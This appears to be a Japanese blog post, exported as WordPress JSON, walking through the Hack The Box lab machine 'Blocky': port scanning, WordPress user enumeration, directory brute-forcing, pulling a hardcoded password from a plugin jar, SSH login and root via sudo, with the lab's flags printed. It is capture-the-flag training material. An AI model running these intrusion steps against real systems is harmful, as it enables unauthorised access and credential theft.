{"id":3710,"date":"2020-08-04T23:44:59","date_gmt":"2020-08-04T14:44:59","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3710"},"modified":"2020-08-30T23:35:07","modified_gmt":"2020-08-30T14:35:07","slug":"hack-the-box-blocky-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3710","title":{"rendered":"Hack The Box – Blocky – Walkthrough"},"content":{"rendered":"

\u30dd\u30fc\u30c8\u30b9\u30ad\u30e3\u30f3\u3067WordPress\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u628a\u63e1<\/h3>\n
\r\n# nmap -A -n -F -T5 blocky.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-04 12:59 UTC\r\nNmap scan report for blocky.htb (10.10.10.37)\r\nHost is up (0.042s latency).\r\nNot shown: 97 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n21\/tcp open  ftp     ProFTPD 1.3.5a\r\n22\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey:\r\n|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)\r\n|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)\r\n|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)\r\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\r\n|_http-generator: WordPress 4.8\r\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\r\n|_http-title: BlockyCraft &#8211; Under Construction!\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\r\n\r\nTRACEROUTE (using port 80\/tcp)\r\nHOP RTT     ADDRESS\r\n1   0.07 ms 172.17.0.1\r\n2   2.45 ms 10.10.10.37\r\n\r\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\r\nNmap done: 1 IP address (1 host up) scanned in 28.83 seconds\r\n<\/pre>\n
WPScan\u3067notch\u3068\u3044\u3046\u30e6\u30fc\u30b6\u304c\u3044\u308b\u3053\u3068\u3092\u628a\u63e1<\/h3>\n
\r\n# wpscan --url http:\/\/blocky.htb\/ --enumerate u\r\n_______________________________________________________________\r\n         __          _______   _____\r\n         \\ \\        \/ \/  __ \\ \/ ____|\r\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\r\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | '_ \\\r\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\r\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\r\n\r\n         WordPress Security Scanner by the WPScan Team\r\n                         Version 3.8.4\r\n       Sponsored by Automattic - https:\/\/automattic.com\/\r\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\r\n_______________________________________________________________\r\n\r\n[+] URL: http:\/\/blocky.htb\/ [10.10.10.37]\r\n[+] Started: Tue Aug  4 13:32:18 2020\r\n\r\nInteresting Finding(s):\r\n\r\n[+] Headers\r\n | Interesting Entry: Server: Apache\/2.4.18 (Ubuntu)\r\n | Found By: Headers (Passive Detection)\r\n | Confidence: 100%\r\n\r\n[+] XML-RPC seems to be enabled: http:\/\/blocky.htb\/xmlrpc.php\r\n | Found By: Direct Access (Aggressive Detection)\r\n | Confidence: 100%\r\n | References:\r\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\r\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\r\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\r\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\r\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\r\n\r\n[+] http:\/\/blocky.htb\/readme.html\r\n | Found By: Direct Access (Aggressive Detection)\r\n | Confidence: 100%\r\n\r\n[+] Upload directory has listing enabled: http:\/\/blocky.htb\/wp-content\/uploads\/\r\n | Found By: Direct Access (Aggressive Detection)\r\n | Confidence: 100%\r\n\r\n[+] The external WP-Cron seems to be enabled: http:\/\/blocky.htb\/wp-cron.php\r\n | Found By: Direct Access (Aggressive Detection)\r\n | Confidence: 60%\r\n | References:\r\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\r\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\r\n\r\n[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).\r\n | Found By: Emoji Settings (Passive Detection)\r\n |  - http:\/\/blocky.htb\/, Match: 'wp-includes\\\/js\\\/wp-emoji-release.min.js?ver=4.8'\r\n | Confirmed By: Meta Generator (Passive Detection)\r\n |  - http:\/\/blocky.htb\/, Match: 'WordPress 4.8'\r\n\r\n[i] The main theme could not be detected.\r\n\r\n[+] Enumerating Users (via Passive and Aggressive Methods)\r\n Brute Forcing Author IDs - Time: 00:00:01 <==================================================================================================================> (10 \/ 10) 100.00% Time: 00:00:01\r\n\r\n[i] User(s) Identified:\r\n\r\n[+] notch\r\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\r\n | Confirmed By: Login Error Messages (Aggressive Detection)\r\n\r\n[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.\r\n[!] You can get a free API token with 50 daily requests by registering at https:\/\/wpvulndb.com\/users\/sign_up\r\n\r\n[+] Finished: Tue Aug  4 13:32:26 2020\r\n[+] Requests Done: 24\r\n[+] Cached Requests: 26\r\n[+] Data Sent: 5.365 KB\r\n[+] Data Received: 169.842 KB\r\n[+] Memory used: 110.863 MB\r\n[+] Elapsed time: 00:00:07\r\n<\/pre>\n
\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30b9\u30ad\u30e3\u30f3\u3057\u3066\u307f\u308b\u3068\u3001\u6c17\u306b\u306a\u308b\u30d5\u30a1\u30a4\u30eb\u304c\u3044\u304f\u3064\u304b\u898b\u3064\u304b\u308b<\/h3>\n
\r\n# gobuster dir -u http:\/\/blocky.htb -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n[+] Url:            http:\/\/blocky.htb\r\n[+] Threads:        10\r\n[+] Wordlist:       \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n[+] Status codes:   200,204,301,302,307,401,403\r\n[+] User Agent:     gobuster\/3.0.1\r\n[+] Timeout:        10s\r\n===============================================================\r\n2020\/08\/04 13:56:32 Starting gobuster\r\n===============================================================\r\n\/wiki (Status: 301)\r\n\/wp-content (Status: 301)\r\n\/plugins (Status: 301)\r\n\/wp-includes (Status: 301)\r\n\/javascript (Status: 301)\r\n\/wp-admin (Status: 301)\r\n\/phpmyadmin (Status: 301)\r\n<\/pre>\n
wiki\u306b\u3088\u308b\u3068\u3001plugins\u306b\u60c5\u5831\u304c\u3042\u308a\u305d\u3046\u306a\u3053\u3068\u304c\u308f\u304b\u308b<\/h3>\n
\"\"<\/a>
\n\"\"<\/a><\/p>\n
\u9006\u30b3\u30f3\u30d1\u30a4\u30eb\u3057\u3066\u307f\u308b\u3068\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u5165\u624b\u3067\u304d\u308b\u305f\u3081\u3001SSH\u3057\u3066\u307f\u308b<\/h3>\n
\u6b63\u3057\u304f\u9006\u30b3\u30f3\u30d1\u30a4\u30eb\u3067\u304d\u308c\u3070\u3001\u3082\u3063\u3068\u3044\u3044\u611f\u3058\u306b\u5024\u3092\u53d6\u5f97\u3067\u304d\u308b\u3089\u3057\u3044\u3002<\/p>\n
\r\n# wget http:\/\/10.10.10.37\/plugins\/files\/BlockyCore.jar\r\n# unzip BlockyCore.jar\r\nArchive:  BlockyCore.jar\r\n  inflating: META-INF\/MANIFEST.MF\r\n  inflating: com\/myfirstplugin\/BlockyCore.class\r\n# lv com\/myfirstplugin\/BlockyCore.class\r\n... 8YsqfCTnvxAUeduzjNSXe22 ...\r\n\r\n# ssh notch@blocky.htb\r\nnotch@blocky.htb's password:\r\n\r\n$ cat user.txt\r\n59fee0977fb60b8a0bc6e41e751f3cd5\r\n$ sudo su\r\n# cat \/root\/root.txt\r\n0a9694a5b4d272c694679f7860f1cd5f\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
\u30dd\u30fc\u30c8\u30b9\u30ad\u30e3\u30f3\u3067WordPress\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u628a\u63e1 # nmap -A -n -F -T5 blocky.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-0 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3710"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3710"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3710\/revisions"}],"predecessor-version":[{"id":3791,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3710\/revisions\/3791"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3710"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}